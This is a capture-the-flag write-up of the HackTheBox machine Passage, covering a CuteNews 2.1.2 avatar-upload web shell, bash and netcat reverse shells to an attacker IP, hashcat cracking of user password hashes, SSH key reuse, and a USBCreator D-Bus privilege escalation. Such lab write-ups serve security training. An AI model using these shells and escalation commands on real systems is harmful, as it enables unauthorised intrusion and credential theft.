---
title: HTB Passage
date: 2021-03-07
---

# HTB : Passage

## Initial recon

```
sudo nmap -sS -sV -sC 10.10.10.206 > rec_ini
```

![](Pictures/rec_ini.png)


This shows that : 

- The ssh port 22 is open and 
- HTTPS port 80 is open

So, we will let a full port scan run in the background while we take a look at the web page.

```
sudo nmap -T5 -p- 10.10.10.206 > all_ports
```

This does not give us anything interesting

### Checking the web page

![](Pictures/web_page.png)

This web page is a collection of new articles. This runs php and takes a parameter. So I checked for LFI, but nothing useful was available.

In one of the message by the admins, it was stated that excessive access to the website will result in a 2 minutes ban.

![](Pictures/rec_ini.png)

So, we should avoid using `gobuster` or any other bruteforce tools. Checking for stored XSS in the comment section, I could not find anything. 

Checking the website and source code of the website, it seems that the web site is running CuteNew CMS.

![](Pictures/cutenews.png)

Apart from that we get a few important username and email addresses. : 

```
nadav@passage.htb

paul@passage.htb
```

Others just have `example` domain.  We also find that there is a directory `CuteNew`, since it is running CuteNews CMS.

But going to that directory we find that it needs a login. 

![](Pictures/cutenews_login.png)

I registered in CuteNews 

![](Pictures/register.png)

I couldn't find anything after logging in with my user. So I started looking for CuteNews CMS exploits.

### Foothold

After looking into the exploits I find a Remote Code Execution for CuteNews :

[Cute News exploit](https://www.exploit-db.com/exploits/46698). 

This exploit is for version 2.1.2 and the version on this server is also 2.1.2 :

![](Pictures/version.png)

However this is a metasploit exploit. So I'll try to exploit this manually. 

This PoC explains the exploit properly : [PoC](https://github.com/mt-code/CVE-2019-11447)

It seems that while uploading the avatar there is a poor file checking and we can upload a reverse shell. 

![](Pictures/avatar_location.png)

This is where the avatar is located. We can try by uploading a simple php shell in the avatar upload section.

```
cat rce.php 
<?php system($_REQUEST['cmd']);?>
```

This is what my shell looks like. The uploaded shell will take a parameter called `cmd` and execute out system commands.

![](Pictures/fail2ban.png)

The error says that the avatar is not correct. Taking a look at the PoC, we can find out that the avatar needs to in GIF format. So I give the magic bytes for GIF to my shell.

![](Pictures/spoofed.png)

Now this file will act as a GIF.

![](Pictures/version.png) 

Now the GIF has been updated successfully and we can use our reverse shell by visiting the path : http://10.10.10.206/CuteNews/uploads/avatar_dos_rce.php?cmd=whoami

![](Pictures/code_exec.png)

Now we have code execution on the box. We can try pinging ourselves, by sending the request : 

```
curl http://10.10.10.206/CuteNews/uploads/avatar_dos_rce.php?cmd=ping -c4 10.10.14.53
```

![](Pictures/pings.png)

This shows us that we can ping ourselves from the server. Now we just need to use a bash reverse shell.

```
bash -i >& /dev/tcp/10.10.14.53/1331 0>&1
```

For some reason the bash reverse shell was not working so instead I checked for netcat on the server and found it. So I used netcat to connect back to my machine. 

```
nc 10.10.14.53 1331 -e /bin/bash
```

Payloads used : 

```
curl http://10.10.10.206/CuteNews/uploads/avatar_dos_rce.php?cmd=%6e%63%20%31%30%2e%31%30%2e%31%34%2e%35%33%20%31%33%33%31%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68
```


![](Pictures/shell.png)

## User Privilege escalation

Inside the directory `cdata/users` there are a number of files.

![](Pictures/many_files.png)

If we cat out the contents of all the files we will find that they contain some base64 encoded strings. 

I downloaded all the files on my local machine and looped through them and decoded all of them : 

![](Pictures/many_files.png)

It contains the passwords of all the users. So I copied the passwords of the users paul and nadav, which are the two users. 

I cracked the password for the user `paul` using hashcat. From hash-identifier, I was able to confirm that the hash algorithm was `SHA256` which is mode `1400` is hashcat. 

```
hashcat --example-hashes | grep 'SHA256'
```

```
hashcat -a 0 -m 1400 hash /usr/share/wordlists/rockyou.txt
```

The password it gives is : `atlanta1`

Using this password I was able to escalate my privileges to `paul`.

```
www-data@passage:/var/www/html/CuteNews/uploads$                                                                                                                                              
su paul                                                                                                                                                                                       
su paul                                                                                                                                                                                       
atlanta1                                                                                                                                                                                      
                                                                                                                                                                                              
paul@passage:/var/www/html/CuteNews/uploads$                                                                                                                                                  
paul@passage:/var/www/html/CuteNews/uploads$
```

Nothing was found for the hash for the user `nadav`.

## User

But looking at the home directory of the user `paul` we find the user.txt.

![](Pictures/user.png)

## Escalating to nadav

In paul's ssh directory I found his public and private keys, so I downloaded and them and used them to gain access.

![](Pictures/ssh_keys.png)

While checking out the ssh keys in paul's directory I found out that the user for nadav was also registered as an authorized key in paul's ssh directory. So we can try to login as nadav using the same key as paul's.

![](Pictures/nadav_key.png)


![](Pictures/nadav_key.png)

## Root

I downloaded linpeas and ran for enumeration. Going through the linpeas results, I found out a CUPs server running locally on port 631 as root. But you cannot exploit it in this case. 

Apart from that no important things were found. So I used pspy to check specifically check the processes running.

### Some interesting edited files

While going through all the hidden files in the home directory, I found that in the `.viminfo`, the name of a file called `/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf` was mentioned. This is not something which I see normally.

![](Pictures/error.png)

So I catted out the file : 

```
nadav@passage:~$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>
```

It seems that the root can only own this service. There is a local privilege escalation for this service.

Refer to : [USB Creator privesc](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/?web_view=true)

It seems that you can copy files from the root user's directory to somewhere else using the command.

`gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/fuck true`


This will give me the root flag. You can copy the ssh keys, if you want to get a shell.

![](Pictures/root.png)

